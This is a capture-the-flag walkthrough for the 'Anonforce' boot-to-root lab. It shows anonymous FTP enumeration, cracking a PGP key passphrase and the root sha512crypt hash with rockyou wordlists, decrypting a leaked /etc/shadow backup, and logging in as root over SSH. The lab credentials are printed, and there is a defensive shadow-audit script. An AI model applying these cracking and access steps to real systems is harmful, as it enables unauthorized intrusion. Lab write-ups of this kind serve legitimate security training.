Anonforce

boot2root machine for FIT and BSides Guatemala CTF

Room Level

Easy

Challenge Overview

Anonforce is a boot-to-root challenge from BSides Guatemala CTF that involves exploiting an FTP server with anonymous access. The challenge requires decrypting PGP files, cracking password hashes, and ultimately gaining root access to retrieve the final flag.

Enumeration

Nmap Scan

We begin with a port scan to identify open services on the target:

```bash
nmap -A -oN nmap.txt 10.10.182.27
```

Scan Results:

```bash
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.14.102.54
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
| drwxr-xr-x   17 0        0            3700 Oct 25 03:22 dev
| drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
| drwx------    2 0        0           16384 Aug 11  2019 lost+found
| drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
| drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
| drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread [NSE: writeable]
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
| dr-xr-xr-x   87 0        0               0 Oct 25 03:22 proc
| drwx------    3 0        0            4096 Aug 11  2019 root
| drwxr-xr-x   18 0        0             540 Oct 25 03:22 run
| drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
| dr-xr-xr-x   13 0        0               0 Oct 25 03:22 sys
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8af9483e11a1aafcb78671d02af624e7 (RSA)
|   256 735dde9a886e647ae187ec65ae1193e3 (ECDSA)
|_  256 56f99f24f152fc16b77ba3e24f17b4ea (ED25519)
```

Key Findings:

  • Port 21 (FTP): vsftpd 3.0.3 with anonymous login allowed, and the anonymous listing exposes the filesystem root
  • Port 22 (SSH): OpenSSH 7.2p2 available
  • Notable Directory: /notread is world-writable and owned by uid 1000

Initial Access

FTP Enumeration

Since anonymous login is permitted, we connect to the FTP service:

```bash
ftp 10.10.182.27
```

```bash
Connected to 10.10.182.27.
220 (vsFTPd 3.0.3)
Name (10.10.182.27:rether): anonymous
331 Please specify the password.
Password:
230 Login successful.
```

The Nmap scan already flagged /notread as the one world-writable directory. Let's explore it:

```bash
ftp> cd notread
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||65228|)
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000         1083 Aug 11  2019 backup.pgp
-rw-r--r--    1 1000     1000         1735 Aug 11  2019 private.asc
226 Directory send OK.
```

We find two files:

  • backup.pgp - a PGP-encrypted file
  • private.asc - an ASCII-armored PGP private key

These files are clearly related: backup.pgp was most likely encrypted to the key in private.asc, so we need that key's passphrase before we can use it to decrypt backup.pgp.

IMPORTANT

User flag location: /home/melodias/user.txt

Hash Cracking and Decryption

Extracting the PGP Key Passphrase

The private.asc file is a GPG private key whose secret material is protected by a passphrase. We can convert the key into a crackable hash with gpg2john and then run John the Ripper against it with a wordlist:

```bash
gpg2john private.asc > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

Output:

```bash
xbox360          (anonforce)
```

The passphrase is xbox360.

Decrypting the Backup File

Now we can import the private key and decrypt backup.pgp with it, supplying the cracked passphrase when GPG asks for it:

```bash
gpg --import private.asc
gpg --decrypt backup.pgp > backup_decrypted
```

When prompted for the passphrase, enter: xbox360

Let's examine the decrypted contents:

```bash
cat backup_decrypted
```

Output:

```bash
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
# ... more entries
```

Perfect! The decrypted file is a copy of /etc/shadow, and it contains entries for two interesting users:

  • root - a sha512crypt hash (the $6$ prefix)
  • melodias - an md5crypt hash (the $1$ prefix), a much weaker scheme
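A small audit script for the shadow format just recovered, added here as an example and not part of the original writeup: it parses each entry, identifies the crypt(3) scheme from the `$id$` prefix, and flags the conditions a defender would want to catch in a leaked or backed-up shadow file (md5crypt entries, empty password fields, unrecognised schemes). The root and melodias lines are the page's own; the daemon and guest lines are constructed to exercise the locked and empty cases.

```python
import re
from dataclasses import dataclass
from typing import List

# Sample in /etc/shadow format. First two entries are from the decrypted
# backup above; the last two are constructed to cover locked/empty accounts.
SAMPLE_SHADOW = """\
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
daemon:*:18120:0:99999:7:::
guest::18120:0:99999:7:::
"""

# crypt(3) scheme id -> (name, weak?). md5crypt is fast enough that wordlist
# attacks are cheap; the others are the slow, salted schemes in current use.
SCHEMES = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "y": ("yescrypt", False),
}
# Modular crypt format: $id$[rounds=N$]salt$digest
HASH_RE = re.compile(
    r"^\$(?P<id>[^$]+)\$(?:rounds=(?P<rounds>\d+)\$)?(?P<salt>[^$]*)\$(?P<digest>[^$:]+)$")

@dataclass
class ShadowFinding:
    user: str
    status: str        # "hashed", "locked", "empty" or "unknown"
    algorithm: str     # e.g. "sha512crypt"
    salt: str
    weak: bool         # True when the entry deserves an audit finding
    max_age_days: int  # field 5 of the entry (99999 means effectively never)

def audit_entry(line: str) -> ShadowFinding:
    """Classify one shadow(5) line. Raises ValueError if it is not one."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"not a shadow entry: {line!r}")
    user, pw, _last, _min, max_age, *_rest = fields
    max_days = int(max_age) if max_age else -1
    if pw == "":                      # no password at all: login without one
        return ShadowFinding(user, "empty", "none", "", True, max_days)
    if pw[0] in "*!":                 # locked or disabled account
        return ShadowFinding(user, "locked", "none", "", False, max_days)
    m = HASH_RE.match(pw)
    if not m:                         # e.g. legacy DES or corrupted field
        return ShadowFinding(user, "unknown", "unrecognised", "", True, max_days)
    algo, weak = SCHEMES.get(m["id"], (f"unrecognised-${m['id']}$", True))
    return ShadowFinding(user, "hashed", algo, m["salt"], weak, max_days)

def audit_shadow(text: str) -> List[ShadowFinding]:
    """Audit every non-empty, non-comment line of a shadow-format dump."""
    return [audit_entry(l) for l in text.splitlines()
            if l.strip() and not l.startswith("#")]
```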

Cracking the Root Password

The root user's hash is sha512crypt (the $6$ prefix), which is Hashcat mode 1800. Let's crack it with the same wordlist:

```bash
echo '$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0' > root-hash.txt
hashcat -m 1800 root-hash.txt /usr/share/wordlists/rockyou.txt
```

Output:

```bash
$6$07nYFaYf...:hikari
```

The root password is hikari.

Root Access

SSH Login

Now we can log in to the system as root over SSH:

```bash
ssh root@10.10.182.27
# password: hikari
```

Output:

```bash
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
```

Success! We now have root access to the system.

IMPORTANT

Root flag location: /root/root.txt